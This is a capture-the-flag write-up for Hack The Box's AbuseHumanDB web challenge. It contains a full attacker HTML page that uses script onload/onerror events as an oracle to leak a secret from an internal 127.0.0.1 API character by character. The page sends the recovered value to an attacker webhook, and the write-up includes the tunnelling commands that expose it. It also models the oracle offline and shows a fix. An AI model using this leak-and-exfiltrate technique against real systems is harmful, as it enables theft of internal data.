
HackTheBox AbuseHumanDB Writeup

AbuseHumanDB is an easy-level web challenge on Hack The Box. The site lets you report an "abusive content" URL, which is then fetched by the challenge's own browser. A page you control can make that browser issue `<script src>` requests to an internal search API on 127.0.0.1:1337, and the onload/onerror events of those script tags act as a yes/no oracle that leaks the flag one character at a time. The writeup below covers the oracle page, exposing it to the internet, and collecting the result.

You need two public endpoints: a webhook that receives the leaked flag (for example https://app.interactsh.com/) and a public URL for the page below, served from a VPS with an open port or through a tunneling service.

index.html

<html>
<head></head>
<body>
<script type="text/javascript">
    // Alphabet tried at each flag position. "}" comes first so the terminator
    // is tested before any other character at every step.
    const flagCharset = "}0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!$()*,-[]_";
    const webhookUrl = "https://webhook.com?flag="; // <-- replace with your webhook URL
    let flag = "HTB{";
    let charIndex = 0;

    const bruteForce = () => {
        if (charIndex >= flagCharset.length) {
            // No character extends the current prefix: report what we have
            // (it will not end in "}") instead of looping forever.
            const img = new Image();
            img.src = webhookUrl + encodeURIComponent(flag);
            return;
        }
        const candidate = flag + flagCharset.charAt(charIndex);
        const script = document.createElement("script");
        // Protocol-relative, so the page must be served over http:// for this
        // to resolve to http://127.0.0.1:1337 inside the challenge's browser.
        // A matching prefix answers with HTTP 200 (onload); a miss answers
        // with an error status (onerror). That one bit is the whole oracle.
        script.src = `//127.0.0.1:1337/api/entries/search?q=${encodeURIComponent(candidate)}`;
        script.onload = () => {
            script.remove();
            flag = candidate;
            charIndex = 0;
            if (flag.slice(-1) !== "}") {
                bruteForce();
            } else {
                // Full flag recovered: exfiltrate it through an image request.
                const img = new Image();
                img.src = webhookUrl + encodeURIComponent(flag);
            }
        };
        script.onerror = () => {
            script.remove();
            charIndex += 1;
            bruteForce();
        };
        document.body.appendChild(script);
    };
    bruteForce();
</script>
</body>
</html>
Serve the page locally (port 8000 by default):

python -m http.server

Expose port 8000 through a tunnel; localhost.run prints a public URL for it:

ssh -R 80:localhost:8000 localhost.run

Submit the tunnel's http:// URL (not https://, so the protocol-relative script src in the page resolves to http://127.0.0.1:1337) in the Abusive Content URL field, then check your webhook for the leaked flag.
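To make the oracle concrete without a browser or the live challenge, here is an added, stand-alone model of what the index.html brute force depends on. It is not code from the writeup or the challenge: `vulnerableSearch` and `hardenedSearch` are assumed stand-ins for /api/entries/search (the real endpoint is assumed to answer a matching prefix with HTTP 200 and a miss with an error status, which is what the script's onload/onerror handling requires), and `SAMPLE_ENTRIES` is constructed sample data. The brute force is written generically, with the stop condition the page's script lacks, and is run against both endpoint models so the fix (a status that does not depend on the match) is visible next to the leak.

```javascript
// Added example: offline model of the <script src> status-code oracle used by
// the index.html page above. Endpoint models and sample data are assumptions.

const FLAG_CHARSET =
  "}0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!$()*,-[]_";

// Constructed sample data standing in for the challenge's entries table.
const SAMPLE_ENTRIES = ["HTB{pr3f1x_0r4cl3}", "nothing to see here"];

// Model of the leaky endpoint: HTTP 200 when some entry starts with q, 404
// otherwise. Loaded as <script src>, a 200 fires onload and a 404 fires
// onerror, which is the one bit per request the brute force consumes.
// (A substring search behaves the same here, since every query begins with
// the unique prefix "HTB{".)
function vulnerableSearch(entries, q) {
  return entries.some((e) => e.startsWith(q)) ? 200 : 404;
}

// Model of a fixed endpoint: the matches still go in the response body, but
// the status is 200 either way, so a cross-origin <script> include observes
// nothing (the body of a script load is not readable from the including page).
function hardenedSearch(entries, q) {
  entries.filter((e) => e.startsWith(q)); // body only; not visible cross-origin
  return 200;
}

// Generic prefix-oracle brute force. oracle(q) answers true when the server
// accepts q as a prefix. Returns the recovered string, or null when no
// character extends the prefix (the page's script would loop forever there)
// or when maxLen is reached without seeing the terminator.
function leakByPrefix(oracle, prefix, charset, maxLen, terminator = "}") {
  let found = prefix;
  while (found.length < maxLen) {
    let extended = false;
    for (const ch of charset) {
      if (oracle(found + ch)) {
        found += ch;
        extended = true;
        break;
      }
    }
    if (!extended) return null;
    if (found.endsWith(terminator)) return found;
  }
  return null;
}

// Drive the brute force against either endpoint model, mapping the HTTP
// status to the onload/onerror bit exactly as the browser would.
function leakFlag(searchFn, entries, maxLen = 64) {
  const oracle = (q) => searchFn(entries, q) === 200;
  return leakByPrefix(oracle, "HTB{", FLAG_CHARSET, maxLen);
}

console.log("vulnerable endpoint leaks:", leakFlag(vulnerableSearch, SAMPLE_ENTRIES));
console.log("hardened endpoint yields: ", leakFlag(hardenedSearch, SAMPLE_ENTRIES));
```

Against the vulnerable model the loop recovers the full flag; against the hardened model every candidate "succeeds", so the first character tried ("}") is accepted immediately and the result is the meaningless `HTB{}`. That is the property to check for in any endpoint an attacker-controlled page can include as a script: the observable outcome must not depend on the secret.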

Summary

The AbuseHumanDB Challenge on Hack The Box is an easy-level challenge in which an attacker-controlled HTML page, loaded by the challenge's own browser, uses `<script>` onload/onerror events against an internal search API as a per-character oracle for the flag; the page is exposed through a localhost.run tunnel and the recovered flag is sent to a webhook. It is a hands-on introduction to cross-site leaks through script inclusion and to abusing a URL-submission feature to reach services that are only meant to be reachable from localhost.

This post is licensed under CC BY 4.0 by the author.